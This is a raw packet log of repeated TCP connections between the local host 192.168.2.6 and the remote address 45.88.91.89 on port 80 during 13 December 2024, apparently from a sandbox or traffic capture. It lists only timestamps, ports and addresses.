                                                      Dec 13, 2024 14:32:59.938399076 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:00.060328960 CET804982245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:00.060358047 CET804982245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:00.060450077 CET804982245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:00.678548098 CET804982245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:00.735260010 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:00.917119026 CET804982245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:01.047569990 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:01.048906088 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:01.049488068 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:01.169966936 CET804982245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:01.170031071 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:01.170335054 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:01.170541048 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:01.170731068 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:01.290503025 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:01.516442060 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:01.636396885 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:01.636423111 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:01.636488914 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:02.315752029 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:02.360078096 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:02.564076900 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:02.610069036 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:03.003606081 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:03.004020929 CET4983080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:03.123848915 CET804983045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:03.123924971 CET4983080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:03.123940945 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:03.123995066 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:03.124161959 CET4983080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:03.243978024 CET804983045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:03.469582081 CET4983080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:03.589703083 CET804983045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:03.589745045 CET804983045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:03.589772940 CET804983045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.210403919 CET804983045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.235840082 CET4983680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.238349915 CET4983080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.356000900 CET804983645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.356096983 CET4983680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.356209993 CET4983680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.357256889 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.358756065 CET804983045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.358820915 CET4983080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.475883007 CET804983645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.477390051 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.477474928 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.477627993 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.597779989 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.703957081 CET4983680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.823967934 CET804983645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.823985100 CET804983645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.829014063 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.949048996 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.949063063 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.949071884 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:05.441090107 CET804983645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:05.485275030 CET4983680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:05.563888073 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:05.677130938 CET804983645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:05.719448090 CET4983680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:05.735074043 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:05.797722101 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:05.844549894 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:05.920952082 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:05.920955896 CET4983680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:05.921341896 CET4984380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:06.041224957 CET804984345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:06.041271925 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:06.041367054 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:06.041502953 CET4984380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:33.047697067 CET4991780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:33.093194962 CET4991780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:33.093540907 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:33.213341951 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:33.213484049 CET804991745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:33.213609934 CET4991780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:33.213620901 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:33.213720083 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:33.333523035 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:33.563359976 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:33.683166027 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:33.683222055 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:33.683238029 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:34.299746037 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:34.469577074 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:34.564147949 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:34.672620058 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:34.688219070 CET4992880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:34.688379049 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:34.808186054 CET804992845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:34.808258057 CET4992880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:34.808398008 CET4992880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:34.808583975 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:34.808670998 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:34.928457022 CET804992845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.157095909 CET4992880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.277348995 CET804992845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.277370930 CET804992845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.277393103 CET804992845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.626462936 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.626688957 CET4992880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.746356964 CET804993045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.746444941 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.746550083 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.747092962 CET804992845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.747148037 CET4992880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.748424053 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.866276026 CET804993045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.868138075 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.868208885 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.868380070 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.988337040 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:36.094605923 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:36.215913057 CET804993045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:36.216166019 CET804993045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:36.219671965 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:36.340291023 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:36.340306044 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:36.340317011 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:36.832726955 CET804993045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:36.875752926 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:36.953609943 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.065953970 CET804993045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.110121012 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.110615015 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.189125061 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.266379118 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.312259912 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.312356949 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.312623978 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.432559013 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.432584047 CET804993045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.432671070 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.432735920 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.432826042 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.433168888 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.433219910 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.552561998 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.782176971 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.902075052 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.902091026 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.902118921 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:38.575155020 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:38.625750065 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:38.809088945 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:38.863241911 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:38.947113991 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:38.947361946 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:39.067075014 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:39.067174911 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:39.067250013 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:39.067308903 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:39.067327976 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:39.187144041 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:39.422705889 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:39.542742014 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:39.542768002 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:39.542781115 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:40.153320074 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:40.205425024 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:40.393306971 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:40.438241005 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:40.512742043 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:40.512784004 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:40.632574081 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:40.632658958 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:40.632817030 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:40.632982016 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:40.633059978 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:40.752551079 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:40.985248089 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:41.105133057 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:41.105155945 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:41.105269909 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:41.723052025 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:41.766377926 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:41.957170010 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.000771999 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.079401016 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.079696894 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.087826967 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.093044043 CET4978380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.093092918 CET4977180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.199465990 CET804995145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.199568987 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.199589014 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.199630022 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.199922085 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.207631111 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.207712889 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.207834959 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.321171045 CET804995145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.327481031 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.547827005 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.563332081 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.667789936 CET804995145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.667810917 CET804995145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.683419943 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.683440924 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.683454037 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.287892103 CET804995145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.293193102 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.328860998 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.344494104 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.522574902 CET804995145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.525846958 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.526324034 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.526381016 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.578852892 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.646220922 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.649436951 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.653067112 CET4995780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.653115034 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.773149014 CET804995745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.773395061 CET804995145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.773480892 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.773684978 CET4995780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.773684978 CET4995780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.893623114 CET804995745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:44.125982046 CET4995780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:44.245964050 CET804995745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:44.245980978 CET804995745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:44.245992899 CET804995745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:44.955610991 CET804995745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:45.000783920 CET4995780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:45.189002037 CET804995745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:45.235174894 CET4995780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:45.309746027 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:45.429594040 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:45.429838896 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:45.429943085 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:45.549700022 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:45.782121897 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:45.902069092 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:45.902100086 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:45.902146101 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:46.515322924 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:46.556598902 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:46.749064922 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:46.797635078 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:46.874211073 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:46.875102997 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:46.994416952 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:46.994812012 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:46.994906902 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:46.994909048 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:46.995266914 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:47.114914894 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:47.344631910 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:47.465749979 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:47.465903044 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:47.466053963 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.091969013 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.141386032 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.313396931 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.360129118 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.432476997 CET4995780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.435719013 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.436455965 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.533935070 CET4997280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.555752039 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.555821896 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.556186914 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.556263924 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.556397915 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.653819084 CET804997245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.654017925 CET4997280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.654072046 CET4997280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.676112890 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.776227951 CET804997245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.907146931 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:49.000854969 CET4997280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:49.027081966 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.027106047 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.027141094 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.120649099 CET804997245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.120915890 CET804997245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.642421007 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.688276052 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:49.742472887 CET804997245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.797727108 CET4997280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:49.881211996 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.922777891 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:49.977381945 CET804997245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.998722076 CET4997280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:49.998725891 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:49.998960018 CET4997780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:50.118799925 CET804997745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:50.118892908 CET804997245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:50.119016886 CET4997780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:50.119020939 CET4997280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:50.119132042 CET4997780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:50.119539976 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:50.119595051 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:50.239185095 CET804997745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:50.469595909 CET4997780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:50.589420080 CET804997745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:50.589449883 CET804997745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:50.589462996 CET804997745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:51.208178997 CET804997745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:51.250740051 CET4997780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:51.441313028 CET804997745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:51.485131025 CET4997780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:51.558572054 CET4997780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:51.558670044 CET4997980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.140647888 CET5005880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.140921116 CET5006380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.188808918 CET5006480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.260951042 CET805006345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.261008024 CET805005845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.261084080 CET5005880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.261101961 CET5006380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.261209965 CET5006380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.308717966 CET805006445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.311395884 CET5006480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.311486959 CET5006480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.381284952 CET805006345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.431349993 CET805006445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.610286951 CET5006380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.657241106 CET5006480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.730267048 CET805006345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.730282068 CET805006345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.730293989 CET805006345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.777221918 CET805006445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.777246952 CET805006445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:19.346435070 CET805006345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:19.391443014 CET5006380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:19.396612883 CET805006445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:19.438323975 CET5006480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:19.581126928 CET805006345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:19.632977009 CET805006445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:19.687226057 CET5006380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:19.687309027 CET5006480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:19.706763029 CET5006380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:19.706772089 CET5006480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:19.707041025 CET5006980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:19.826800108 CET805006945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:19.826896906 CET5006980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:19.826935053 CET805006345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:19.826987982 CET5006380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:19.827079058 CET5006980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:19.827400923 CET805006445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:19.827470064 CET5006480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:19.948327065 CET805006945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:20.172736883 CET5006980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:20.292563915 CET805006945.88.91.89192.168.2.6
